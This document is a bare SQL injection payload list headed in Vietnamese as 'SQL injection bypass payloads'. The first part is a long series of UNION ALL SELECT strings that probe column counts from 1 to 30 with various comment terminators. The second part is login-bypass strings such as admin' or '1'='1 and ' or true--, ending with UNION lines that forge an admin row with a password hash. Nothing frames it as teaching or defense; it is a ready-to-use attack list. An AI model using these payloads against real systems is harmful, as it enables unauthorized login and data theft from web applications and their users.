UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNION ALL SELECT 'INJ'||'ECT'||'XXX'--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#

Các Payload SQL Injection Bypass

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055